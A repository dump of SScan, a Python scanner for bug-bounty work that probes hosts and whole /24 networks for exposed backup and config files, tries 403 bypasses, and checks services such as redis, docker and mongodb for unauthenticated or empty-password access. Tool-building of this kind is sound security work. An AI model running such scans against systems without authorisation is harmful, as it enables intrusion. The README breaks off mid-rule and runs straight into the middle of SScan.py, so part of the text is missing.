├── README.md
├── SScan.py
├── config
│   ├── __init__.py
│   ├── banner.py
│   ├── log.py
│   └── setting.py
├── images
│   ├── image-20210106105118466.png
│   ├── sscan.gif
│   └── sscan.svg
├── lib
│   ├── __init__.py
│   ├── common
│   │   ├── TestProxy.py
│   │   ├── __init__.py
│   │   ├── common.py
│   │   ├── connectionPool.py
│   │   ├── consle_width.py
│   │   ├── report.py
│   │   ├── scanner.py
│   │   └── utils.py
│   ├── data
│   │   ├── GeoLite2-ASN.mmdb
│   │   ├── cdn_asn_list.json
│   │   ├── cdn_cname_keywords.json
│   │   ├── cdn_header_keys.json
│   │   ├── cdn_ip_cidr.json
│   │   └── fake_useragent.json
│   └── modules
│       ├── __init__.py
│       ├── fofa.py
│       └── iscdn.py
├── logs
│   └── sscan.log
├── report
│   └── _20210106_153943.html
├── requirements.txt
├── rules
│   ├── .idea
│   │   ├── .gitignore
│   │   ├── inspectionProfiles
│   │   │   └── profiles_settings.xml
│   │   ├── misc.xml
│   │   ├── modules.xml
│   │   └── rules.iml
│   ├── apache.txt
│   ├── black.list
│   ├── change_log.txt
│   ├── common_app.txt
│   ├── compressed_backup_files.txt
│   ├── config_file.txt
│   ├── dir.txt
│   ├── directory_traversal.txt
│   ├── disabled
│   │   └── .gitignore
│   ├── druid.txt
│   ├── git_and_svn.txt
│   ├── graphite_ssrf.txt
│   ├── iis.txt
│   ├── java_server_faces2.txt
│   ├── java_web_config_files.txt
│   ├── phpinfo_or_apc.txt
│   ├── phpmyadmin.txt
│   ├── possible_flash_xss.txt
│   ├── python_web.txt
│   ├── resin_admin.txt
│   ├── safetyEquipment.txt
│   ├── sensitive_url.txt
│   ├── shell_scripts.txt
│   ├── source_code_disclosure.txt
│   ├── springboot.txt
│   ├── ssh_sensitive_file.txt
│   ├── test_page.txt
│   ├── tomcat_manager.txt
│   ├── web_editors.txt
│   ├── white.list
│   └── zabbix_jsrpc_sqli.txt
└── scripts
    ├── __init__.py
    ├── disabled
    │   ├── .gitignore
    │   ├── __init__.py
    │   └── smb_ms17010.py
    ├── discuz_backup_file.py
    ├── is_admin_site.py
    ├── kong_admin_rest_api.py
    ├── log_files.py
    ├── mysql_Empty_pwd.py
    ├── outlook_web_app.py
    ├── readme.txt
    ├── scan_by_hostname_or_folder.py
    ├── sensitive_folders.py
    ├── tools
    │   ├── __init__.py
    │   └── port_scan.py
    ├── unauthorized_access_CouchDB.py
    ├── unauthorized_access_Hadoop.py
    ├── unauthorized_access_Hadoop_yarn.py
    ├── unauthorized_access_docker.py
    ├── unauthorized_access_docker_registry_api.py
    ├── unauthorized_access_elasticsearch.py
    ├── unauthorized_access_ftp.py
    ├── unauthorized_access_jboss.py
    ├── unauthorized_access_jenkins.py
    ├── unauthorized_access_memcached.py
    ├── unauthorized_access_mongodb.py
    ├── unauthorized_access_postgresb.py
    ├── unauthorized_access_redis.py
    ├── unauthorized_access_rsync.py
    ├── unauthorized_access_zookeeper.py
    └── wordpress_backup_file.py
/README.md:
--------------------------------------------------------------------------------
1 | ## SScan
2 |
3 | [](https://github.com/yhy0/SScan/)
4 |
5 | [](https://github.com/yhy0/SScan/)
6 |
7 | ### Preface
8 |
9 | An SRC "easy-pickings" scanner. I never had the time to hunt SRC full time (it is a time-consuming job), so since getting into it in August 2019 I relied on the information and vulnerabilities found by [BBScan](https://github.com/lijiejie/BBScan.git), **picking up** bugs from its scan reports in my spare time, and made the JD SRC monthly top 10 three times that way. That gave me the idea of writing my own scanner to find simple vulnerabilities automatically, earn some pocket money, and improve my development skills along the way; after all, people doing security work should also know how to code.
10 |
11 | For now the core logic of [SScan](https://github.com/yhy0/SScan) still follows [BBScan](https://github.com/lijiejie/BBScan.git).
12 |
13 | ### Screenshots
14 |
15 |
16 |
17 | When the scan finishes, the report is written to the report directory; if any vulnerability was found, the report is opened with the default browser.
18 |
19 | ## Usage and options
20 |
21 | ```bash
22 | python3 SScan.py version                 Show the version
23 | python3 SScan.py --help                  Show the help
24 | python3 SScan.py --host example.com run  Scan a single target
25 | python3 SScan.py --file domains.txt run  Read targets from a .txt file
26 | python3 SScan.py --dire /Users/yhy/Desktop/dirs/ run   Read every .txt file in a directory
27 | python3 SScan.py --file domains.txt --network 24 run   network sets a netmask (8 ~ 31) and can be
28 |                  combined with any of the three options above; every IP in the Target/MASK network is scanned
29 | python3 SScan.py --host 127.0.0.1 --script unauthorized_access_redis,unauthorized_access_rsync run
30 |                  Use only the specified scripts
31 |
32 | You can set your fofa API credentials in config/setting.py so that fofa is queried for more web services
33 |
34 | Other options:
35 | --t           Number of scan threads, default 10.
36 | --full        Process all sub-directories: for a link like /x/y/z/, /x/ and /x/y/ are scanned too, default True
37 | --crawl       Crawl the tags on the index page, default True
38 | --checkcdn    Check whether the domain is behind a CDN; if so, the resolved IPs are not probed with rules or scripts, default True
39 | --browser     Open the scan report with the default browser when the scan finishes, default True
40 | --script      Scripts to use, e.g. --script unauthorized_access_redis unauthorized_access_rsync, ... Scripts live in the scripts directory
41 | --rule        Rules to scan with, e.g. --rule RuleFileName1,RuleFileName2,... Rules live in the rules directory
42 | --script_only Scan with scripts only, without the rules
43 | --noscripts   Do not use any scripts
44 |
45 | ```
46 | ## Features
47 |
48 | - [x] Scanning of common paths such as backup files, config files, log files, etc.; see the rules in the `rules` directory for details
49 |
50 | - [x] Information-disclosure issues such as .idea, .git, .DS_Store, springboot, etc.; see the rules in the `rules` directory for details
51 |
52 | - [x] Discovery of back-end/admin login pages
53 |
54 | - [x] 403 page bypass; the bypass logic lives in the `bypass_403` function at line 196 of `lib/common/scanner.py`
55 |
56 | - [x] Scanning of a network segment: `--network 24` scans the target's C-class (/24) assets for vulnerabilities and information
57 |
58 | - [x] Skipping of IPs behind a CDN: when the IP a URL resolves to matches CDN fingerprints, the IP is not added to the scan targets and only the URL is scanned
59 |
60 | - [x] Common unauthorized-access and weak-password checks, currently:
61 |
62 | unauthenticated access to redis, Hadoop, Hadoop yarn, docker, docker registry api, CouchDB, ftp, zookeeper, elasticsearch, memcached, mongodb, rsync, jenkins and jboss, plus empty-password checks for mysql and PostgreSQL; see the `scripts` directory for details
63 |
64 | For database credentials, only empty passwords are checked for now; adding a small weak-password list, like https://github.com/se55i0n/DBScanner/blob/master/lib/exploit.py, is under consideration.
65 |
66 | - [x] When fofa API credentials are set in config/setting.py, the fofa API is queried to find more web services (see the sketch below)
67 |
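A minimal sketch of the corresponding fofa settings in `config/setting.py` (the values below are placeholders, not real credentials):

```python
# config/setting.py -- placeholder credentials
fofaApi = {
    "email": "you@example.com",   # fofa account email
    "key": "your_fofa_api_key",   # fofa API key
}
```

Leaving both fields empty disables the fofa lookup.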
68 | ## Roadmap
69 |
70 | - [ ] Integrate some of the features of [Packer-Fuzzer](https://github.com/rtcatc/Packer-Fuzzer) so that sensitive information and APIs found in JS files can be tested
71 |
72 | - [x] Add 403 bypass, based on [BurpSuite_403Bypasser](https://github.com/sting8k/BurpSuite_403Bypasser)
73 |
74 | Tested against the PortSwigger lab [Lab: URL-based access control can be circumvented](https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented)
75 |
76 |
77 |
78 | - [X] Call the fofa API to query asset information and cover assets more completely
79 |
80 | ## Rules in the rules directory
81 |
82 | - black.list: rule blacklist; anything that matches it is skipped
83 |
84 | - white.list: rule whitelist; anything that matches it is treated as a weak point and added to the results
85 |
86 | - Meaning of the fields used under the rules directory; a typical rule looks like this
87 |
88 | ```
89 | /WEB-INF/applicationContext-slave.xml {tag=" (default True)
42 | :param bool checkcdn: Check the CDN and skip the IP where the CDN exists (default True)
43 | :param bool full: Process all sub directories /x/y/z/,/x/ /x/y/ (default True)
44 | :param str script: ScriptName1,ScriptName2,...
45 | :param bool script_only: Scan with user scripts only
46 | :param bool noscripts: Disable all scripts (default False)
47 | :param bool browser: Open the scan report in the web browser when the scan finishes (default True)
48 |
49 | """
50 |
51 | def __init__(self, host=None, file=None, dire="", network=32, t=10, rule=None,
52 | full=True, script=None, noscripts=False, crawl=True,
53 | browser=True, script_only=False, checkcdn=True):
54 | self.host = host
55 | self.file = file
56 | self.rule_files = []
57 | self.script_files = []
58 | self.dire = dire
59 | self.network = network
60 | self.t = t
61 | self.rule = rule
62 | self.crawl = crawl
63 | self.checkcdn = checkcdn
64 | self.fileull = full
65 | self.scripts_only = script_only
66 | self.script = script
67 | self.no_scripts = noscripts
68 | self.browser = browser
69 |
70 | if self.file:
71 | self.input_files = [self.file]
72 | elif self.dire:
73 | self.input_files = glob.glob(self.dire + '/*.txt')
74 | elif self.host:
75 | self.input_files = [self.host]
76 | self.require_no_http = True  # none of the plugins depend on the HTTP connection pool
77 | self.require_index_doc = False  # plugins need the index page to be fetched
78 | self.require_ports = set()  # ports required by the plugins
79 |
80 | # Load the scan configuration
81 | def config_param(self):
82 | """
83 | Config parameter
84 | """
85 | if self.dire:
86 | self.dire = glob.glob(self.dire + '/*.txt')
87 |
88 | if self.rule is None:
89 | self.rule_files = glob.glob('rules/*.txt')
90 | else:
91 | if isinstance(self.rule, str):
92 | rule = self.rule.split()
93 | else:
94 | rule = self.rule
95 | for rule_name in rule:
96 | if not rule_name.endswith('.txt'):
97 | rule_name += '.txt'
98 | if not os.path.exists('rules/%s' % rule_name):
99 | logger.log('FATAL', 'Rule file not found: %s' % rule_name)
100 | exit(-1)
101 | self.rule_files.append(f'rules/{rule_name}')
102 |
103 | if not self.no_scripts:
104 | if self.script is None:
105 | self.script_files = glob.glob('scripts/*.py')
106 | else:
107 | if isinstance(self.script, str):
108 | script = self.script.split()
109 | else:
110 | script = self.script
111 | for script_name in script:
112 | if not script_name.lower().endswith('.py'):
113 | script_name += '.py'
114 | if not os.path.exists('scripts/%s' % script_name):
115 | logger.log('FATAL', 'Script file not found: %s' % script_name)
116 | exit(-1)
117 |
118 | self.script_files.append('scripts/%s' % script_name)
119 | pattern = re.compile(r'ports_to_check.*?\=(.*)')
120 |
121 | for _script in self.script_files:
122 | with open(_script, encoding='UTF-8') as f:
123 | content = f.read()
124 | if content.find('self.http_request') > 0 or content.find('self.session') > 0:
125 | self.require_no_http = False  # the plugin needs the HTTP connection pool
126 | if content.find('self.index_') > 0:
127 | self.require_no_http = False
128 | self.require_index_doc = True
129 | # collect the ports the plugin needs
130 | m = pattern.search(content)
131 | if m:
132 | m_str = m.group(1).strip()
133 | if m_str.find('#') > 0:  # strip a trailing comment
134 | m_str = m_str[:m_str.find('#')]
135 | if m_str.find('[') < 0:
136 | if int(m_str) not in self.require_ports:
137 | self.require_ports.add(int(m_str))
138 | else:
139 | for port in eval(m_str):
140 | if port not in self.require_ports:
141 | self.require_ports.add(int(port))
142 |
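# Illustrative sketch of the plugin convention the regex above parses (hypothetical values):
#   ports_to_check = 6379        # a single port
#   ports_to_check = [21, 873]   # or a list of ports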
143 | # Validate the command line input
144 | def check_param(self):
145 | """
146 | Check parameter
147 | """
148 | if not (self.file or self.dire or self.host):
149 | msg = '\nTarget missing! One of the following options should be specified \n' \
150 | ' \t--file TargetFile \n' \
151 | ' \t--dire TargetDirectory \n' \
152 | ' \t--host www.host1.com www.host2.com 8.8.8.8'
153 | logger.log('FATAL', msg)
154 | exit(-1)
155 | if self.file and not os.path.isfile(self.file):
156 | logger.log('FATAL', 'TargetFile not found: %s' % self.file)
157 | exit(-1)
158 |
159 | if self.dire and not os.path.isdir(self.dire):
160 | logger.log('FATAL', 'TargetDirectory not found: %s' % self.dire)
161 | exit(-1)
162 |
163 | self.network = int(self.network)
164 | if not (8 <= self.network <= 32):
165 | logger.log('FATAL', 'Network should be an integer between 8 and 32')
166 | exit(-1)
167 |
168 | def main(self):
169 | q_targets = multiprocessing.Manager().Queue() # targets Queue
170 |
171 | q_targets_list = []
172 | q_results = multiprocessing.Manager().Queue() # log Queue
173 |
174 | for input_file in self.input_files:
175 | # Read the targets
176 | if self.host:
177 | target_list = self.host.replace(',', ' ').strip().split()
178 |
179 | elif self.file or self.dire:
180 | with open(input_file, encoding='UTF-8') as inFile:
181 | target_list = inFile.readlines()
182 |
183 | try:
184 | import threading
185 | # generate the report in real time
186 | target_count = len(target_list)  # number of targets
187 | # generate the report and manage the standard output
188 | threading.Thread(target=save_report, args=(self, q_results, input_file, target_count)).start()
189 |
190 | clear_queue(q_results)
191 | clear_queue(q_targets)
192 |
193 | start_time = time.time()
194 |
195 | # create a process pool sized to the number of CPU cores
196 | # count = multiprocessing.cpu_count()
197 | count = 16
198 | # for a small number of targets, create at most 2x as many scan processes
199 | if len(target_list) * 2 < count:
200 | count = len(target_list) * 2
201 | pool = multiprocessing.Pool(count)
202 | num = math.ceil(len(target_list)/count)
203 | domain_start_time = time.time()
204 | logger.log('INFOR', f'Domain name resolution, subnet mask processing, CDN detection, 80/443 port detection, FOFA search started.')
205 | for i in range(0, len(target_list), count):
206 | target = target_list[i:i + count]
207 | pool.apply_async(prepare_targets, args=(target, q_targets, self))
208 | pool.close()
209 | pool.join()
210 |
211 | logger.log("INFOR", f'Domain name resolution, subnet mask processing, CDN detection, 80/443 port detection, FOFA search is over in %.1f seconds!' % (
212 | time.time() - domain_start_time))
213 | time.sleep(1.0)
214 |
215 | while True:
216 | if not q_targets.empty():
217 | q_targets_list.append(q_targets.get())
218 | else:
219 | break
220 |
221 | logger.log("INFOR", f'Targets process all done in %.1f seconds!' % (time.time() - start_time))
222 |
223 | # q_targets.get() {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
224 |
225 | if len(target_list) * 2 < count:
226 | count = len(target_list) * 2
227 |
228 | # pool = multiprocessing.Pool(count)
229 | # logger.log('INFOR', f'{count} scan process created.')
230 | #
231 | # for target in q_targets_list:
232 | # pool.apply_async(scan_process, args=(target, q_results, self))
233 | #
234 | # pool.close()
235 | # pool.join()
236 |
237 | # progress bar setup
238 | from rich.progress import (
239 | BarColumn,
240 | TimeRemainingColumn,
241 | Progress,
242 | )
243 | progress = Progress(
244 | "[progress.description]{task.description}",
245 | BarColumn(),
246 | "[progress.percentage]{task.percentage:>3.0f}%",
247 | TimeRemainingColumn(),
248 | "[bold red]{task.completed}/{task.total}",
249 | transient=True,  # hide the progress bar once it reaches 100%
250 | )
251 | with progress:
252 | targets = []
253 | for target in q_targets_list:
254 | tmp = [target, q_results, self]
255 | targets.append(tmp)
256 |
257 | task_id = progress.add_task("[cyan]Leak detection...", total=len(targets), start=False)
258 |
259 | with multiprocessing.Pool(processes=16) as pool:
260 | results = pool.imap_unordered(scan_process, targets)
261 | for result in results:
262 | # progress.print(result)
263 | progress.advance(task_id)
264 |
265 | time.sleep(1.0)
266 |
267 | cost_time = time.time() - start_time
268 | cost_min = int(cost_time / 60)
269 | cost_min = '%s min ' % cost_min if cost_min > 0 else ''
270 | cost_seconds = '%.1f' % (cost_time % 60)
271 | logger.log('INFOR', f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.')
272 |
273 | except KeyboardInterrupt as e:
274 | setting.stop_me = True
275 | logger.log('INFOR', 'Scan aborted.')
276 | exit(-1)
277 | except FileNotFoundError as e:
278 | logger.log('INFOR', 'Scan aborted.')
279 | exit(-1)
280 | pass
281 | except Exception as e:
282 | logger.log('ERROR', '[__main__.exception] %s %s' % (type(e), str(e)))
283 | setting.stop_me = True
284 |
285 | def print(self):
286 | """
287 | SScan running entrance
288 | Print the banner, validate the command line options
289 | and load the configuration before scanning
290 | """
291 | print(SScan_banner)
292 | dt = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
293 | print(f'[*] Starting SScan @ {dt}\n')
294 | self.check_param()
295 | self.config_param()
296 | check_fofa()
297 |
298 | if self.no_scripts:
299 | logger.log('INFOR', '* Scripts scan was disabled.')
300 | if self.require_ports:
301 | logger.log('INFOR', '* Scripts scan port check: %s' % ','.join([str(x) for x in self.require_ports]))
302 |
303 | def run(self):
304 | self.print()
305 | # network connectivity check
306 | # testProxy(cmd, 1)
307 | # if testProxy(1):
308 | self.main()
309 |
310 | @staticmethod
311 | def version():
312 | """
313 | Print version information and exit
314 | """
315 | print(SScan_banner)
316 | exit(0)
317 |
318 |
319 | if __name__ == '__main__':
320 | # exit gracefully on ctrl-c
321 | signal.signal(signal.SIGINT, ctrl_quit)
322 | fire.Fire(SScan)
323 |
--------------------------------------------------------------------------------
/config/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/config/banner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | yellow = '\033[01;33m'
6 | white = '\033[01;37m'
7 | green = '\033[01;32m'
8 | blue = '\033[01;34m'
9 | red = '\033[1;31m'
10 | end = '\033[0m'
11 |
12 | version = 'v0.5'
13 | message = white + '{' + red + version + ' #dev' + white + '}'
14 |
15 | SScan_banner = f"""{yellow}
16 | SScan is a slow sensitive information detection and vulnerability scanning program.{green}
17 | _____ _____
18 | / ____/ ____|
19 | | (___| (___ ___ __ _ _ __ {message}{blue}
20 | \___ \\___ \ / __/ _` | '_ \
21 | ____) |___) | (_| (_| | | | |
22 | |_____/_____/ \___\__,_|_| |_|
23 |
24 | {red}By yhy(https://github.com/yhy0/SScan.git) {blue}
25 | """
26 |
27 |
--------------------------------------------------------------------------------
/config/log.py:
--------------------------------------------------------------------------------
1 | '''
2 | Uses the logging configuration from OneForAll
3 | https://github.com/shmilylty/OneForAll/blob/master/config/log.py
4 | '''
5 |
6 | import sys
7 | import pathlib
8 |
9 | from loguru import logger
10 |
11 | # path settings
12 | relative_directory = pathlib.Path(__file__).parent.parent  # relative path of the project code
13 | log_save_dir = relative_directory.joinpath('logs')  # directory where log results are saved
14 | log_path = log_save_dir.joinpath(f'sscan.log')  # path of the SScan log file
15 |
16 | # logging configuration
17 | # format of log output to the terminal
18 | stdout_fmt = '\r{time:MM-DD HH:mm:ss,SS} ' \
19 | '[{level: <5} ] ' \
20 | '{module} :{line} - ' \
21 | '{message} '
22 |
23 | # format of log records written to the log file
24 | logfile_fmt = '{time:YYYY-MM-DD HH:mm:ss,SSS} ' \
25 | '[{level: <5} ] ' \
26 | '{process.name}({process.id}) :' \
27 | '{thread.name: <18}({thread.id: <5}) | ' \
28 | '{module} .{function} :' \
29 | '{line} - {message} '
30 |
31 | logger.remove()
32 | logger.level(name='TRACE', color='', icon='✏️')
33 | logger.level(name='DEBUG', color='', icon='🐞 ')
34 | logger.level(name='INFOR', no=20, color='', icon='ℹ️')
35 | logger.level(name='QUITE', no=25, color='', icon='🤫 ')
36 | logger.level(name='ALERT', no=30, color='', icon='⚠️')
37 | logger.level(name='ERROR', color='', icon='❌️')
38 | logger.level(name='FATAL', no=50, color='', icon='☠️')
39 |
40 | # To run silently in the terminal, set level in the following line to QUITE
41 | # The default terminal log level is INFOR
42 | # Thread-safe by default, but not async or multiprocess safe; add enqueue=True for that:
43 | logger.add(sys.stderr, level='INFOR', format=stdout_fmt, enqueue=True)
44 | logger.add(log_path, level='DEBUG', format=logfile_fmt, enqueue=True, encoding='utf-8')
45 |
--------------------------------------------------------------------------------
/config/setting.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import pathlib
6 |
7 | # path settings
8 | relative_directory = pathlib.Path(__file__).parent.parent  # relative path of the project code
9 | data_storage_dir = relative_directory.joinpath('lib/data')  # directory of the data used for CDN checks
10 |
11 | stop_me = False
12 |
13 | ports_saved_to_file = False
14 |
15 | default_headers = {
16 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
17 | "Connection": "close",
18 | "Cache-Control": "max-age=0",
19 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
20 | }
21 |
22 | fofaApi = {
23 | "email": "",
24 | "key": "",
25 | }
26 |
27 | threadNum = 100
28 |
29 | # number of records returned per fofa query
30 | fofaSize = 100
31 |
32 | # restrict fofa query results to this country/region
33 |
34 | fofaCountry = 'CN'
35 |
36 | USER_AGENTS = [
37 | "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
38 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
39 | "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
40 | "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
41 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
42 | "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
43 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
44 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
45 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
46 | "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
47 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
48 | "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
49 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
50 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
51 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
52 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
53 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
54 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
55 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
56 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
57 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
58 | "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
59 | "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
60 | "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
61 | "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
62 | "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
63 | "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
64 | "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
65 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
66 | "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
67 | "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124",
68 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)",
69 | "UCWEB7.0.2.37/28/999",
70 | "NOKIA5700/ UCWEB7.0.2.37/28/999",
71 | "Openwave/ UCWEB7.0.2.37/28/999",
72 | "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
73 | "Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25",
74 | ]
75 |
--------------------------------------------------------------------------------
/images/image-20210106105118466.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/images/image-20210106105118466.png
--------------------------------------------------------------------------------
/images/sscan.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/images/sscan.gif
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/common/TestProxy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- encoding: utf-8 -*-
3 |
4 | import requests
5 | from config.log import logger
6 |
7 | # def testProxy(options,show):
8 | def testProxy(show):
9 | try:
10 | url = "http://myip.ipip.net/"
11 | # proxy_data = {
12 | # 'http': options.proxy,
13 | # 'https': options.proxy,
14 | # }
15 |
16 | ipAddr = requests.get(url, timeout=7, verify=False).text[3:].strip()
17 | # ipAddr = requests.get(url, proxies=proxy_data, timeout=7, verify=False).text.strip()
18 | if show == 1:
19 | logger.log('INFOR', f'[+] Network connectivity check passed, current egress IP: {ipAddr}')
20 | return True
21 | except:
22 | if show == 1:
23 | logger.log('ERROR', f'Failed to reach the Internet, please check your network or proxy settings')
24 | return False
25 |
26 |
--------------------------------------------------------------------------------
/lib/common/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/common/common.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import asyncio
6 | import ipaddress
7 | from config.log import logger
8 | from urllib.parse import urlparse
9 | import socket
10 | from lib.common.scanner import Scanner
11 | from lib.modules.iscdn import check_cdn
12 | from config.setting import fofaApi
13 | from lib.modules.fofa import fmain
14 |
15 | # progress bar setup
16 | from rich.progress import (
17 | BarColumn,
18 | TimeRemainingColumn,
19 | Progress,
20 | )
21 |
22 | # scan worker process
23 | def scan_process(targets):
24 | target, q_results, args = targets[0], targets[1], targets[2]
25 | scanner = Scanner(args=args)
26 | try:
27 | '''
28 | {'scheme': 'http', 'host': '47.97.164.40', 'port': 80, 'path': '', 'ports_open': [80], 'is_neighbor': 0}
29 | '''
30 | # process the target info, load the rules, scripts, and so on
31 | ret = scanner.init_from_url(target)
32 | if ret:
33 | host, results = scanner.scan()
34 | if results:
35 | q_results.put((host, results))
36 |
37 | except Exception as e:
38 | logger.log('ERROR', f'{str(e)}')
39 | finally:
40 | return target
41 |
42 |
43 | # check whether a port is open
44 | async def port_scan_check(ip_port, semaphore, progress, task):
45 | async with semaphore:
46 | ip, port = ip_port[0], ip_port[1]
47 | conn = asyncio.open_connection(ip, port)
48 | try:
49 | reader, writer = await asyncio.wait_for(conn, timeout=10)
50 | # print(ip, port, 'open', ip_port[2], ip_port[3], ip_port[4])
51 | # 127.0.0.1 3306 open http /test.html 8080
52 | writer.close()
53 | progress.update(task, advance=1)
54 | return ip, port, 'open', ip_port[2], ip_port[3], ip_port[4]
55 | except Exception as e:
56 | conn.close()
57 | progress.update(task, advance=1)
58 | return ip, port, 'close', ip_port[2], ip_port[3], ip_port[4]
59 |
60 |
61 | # probe ports 80 and 443, any explicitly specified port, and the ports required by the scripts, for each target
62 | def get_ip_port_list(queue_targets, args):
63 | ip_port_list = []
64 | for _target in queue_targets:
65 | url = _target
66 | # scheme netloc path
67 | if url.find('://') < 0:
68 | scheme = 'unknown'
69 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
70 | path = ''
71 | else:
72 | # scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
73 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
74 |
75 | # when a port is specified in the URL, check whether that port is open
76 | if netloc.find(':') >= 0:
77 | _ = netloc.split(':')
78 | host = _[0]
79 | port = int(_[1])
80 | else:
81 | host = netloc
82 | port = None
83 |
84 | if scheme == 'https' and port is None:
85 | port = 443
86 | elif scheme == 'http' and port is None:
87 | port = 80
88 |
89 | if scheme == 'unknown':
90 | if port == 80:
91 | scheme = 'http'
92 | elif port == 443:
93 | scheme = 'https'
94 |
95 | if port:  # the URL specifies a scheme or a port
